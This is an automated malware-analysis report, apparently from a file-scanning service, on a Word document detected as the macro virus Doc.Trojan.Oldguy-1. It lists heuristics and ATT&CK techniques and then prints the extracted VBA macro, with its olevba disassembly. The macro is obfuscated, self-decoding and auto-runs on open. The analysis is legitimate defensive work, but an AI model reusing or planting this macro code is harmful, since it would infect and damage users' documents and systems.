MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macro code is obfuscated, suggesting an attempt to evade detection. The ClamAV detection name 'Doc.Trojan.Oldguy-1' further supports the malicious nature of the file.
Heuristics 3
-
ClamAV: Doc.Trojan.Oldguy-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Oldguy-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8140 bytes |
SHA-256: 07de146f521a527621767ded08ca11644341a2ebc5c28a1ad3a4fa9164036a52 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù Private Sub Document_Open() On Error Resume Next ¤éÄù¼ò = 153 For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð End Sub Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò) For Éo¥»ßû = 1 To Len(¢UøòçÞ): ªÎÞþÐí = ªÎÞþÐí & Chr(Asc(Mid(¢UøòçÞ, Éo¥»ßû, 1)) Xor ¤éÄù¼ò): Next End Function Private Sub £îñ3zêrð() '=p]`%k¹¤¹¨©¹²¹Ð÷í±Ë÷ý¹³¹«ª° 'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k 'ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡ 'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k° '×üáí 'Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü 'Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý 'Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü 'ÍñðêÝöúìôü÷í·Êøïü 'Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü 'Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü 'Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^ 'j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê 'j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«° 'Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü 'Ü÷ý¹Ðÿ 'Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ 'Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õôª¹õªîã©ë긻° End Sub 'Class.sample by emanuel g0ldstein 'Old guy with new name ;) Don't get me wrong! 'Do not spread this shit! ' Processing file: /opt/analyzer/scan_staging/2c467a347b2d4ede82223f4c398a33b5.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 12006 bytes ' Line #0: ' QuoteRem 0x0000 0x0018 "Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù" ' Line #1: ' FuncDefn (Private Sub Document_Open()) ' Line #2: ' OnError (Resume Next) ' Line #3: ' LitDI2 0x0099 ' St ¤éÄù¼ò ' Line #4: ' StartForVariable ' Ld Éo¥»ßû ' EndForVariable ' LitDI2 0x000B ' LitDI2 0x001C ' For ' BoS 0x0000 ' Ld Éo¥»ßû ' Ld Éo¥»ßû ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0002 ' ArgsLd Mid$ 0x0002 ' Ld ¤éÄù¼ò ' ArgsLd ªÎÞþÐí 0x0002 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemCall ReplaceLine 0x0002 ' BoS 0x0000 ' StartForVariable ' Next ' BoS 0x0000 ' ArgsCall £îñ3zêrð 0x0000 ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò, id_FFFE As Variant)) ' Line #7: ' StartForVariable ' Ld Éo¥»ßû ' EndForVariable ' LitDI2 0x0001 ' Ld ¢UøòçÞ ' FnLen ' For ' BoS 0x0000 ' Ld ªÎÞþÐí ' Ld ¢UøòçÞ ' Ld Éo¥»ßû ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' ArgsLd Asc 0x0001 ' Ld ¤éÄù¼ò ' Xor ' ArgsLd Chr 0x0001 ' Concat ' St ªÎÞþÐí ' BoS 0x0000 ' StartForVariable ' Next ' Line #8: ' EndFunc ' Line #9: ' FuncDefn (Private Sub £îñ3zêrð()) ' Line #10: ' QuoteRem 0x0000 0x001C "=p]`%k¹¤¹¨©¹²¹Ð÷í±Ë÷ý¹³¹«ª°" ' Line #11: ' QuoteRem 0x0000 0x0055 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k" ' Line #12: ' QuoteRem 0x0000 0x0015 "ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡" ' Line #13: ' QuoteRem 0x0000 0x00A2 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°" ' ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.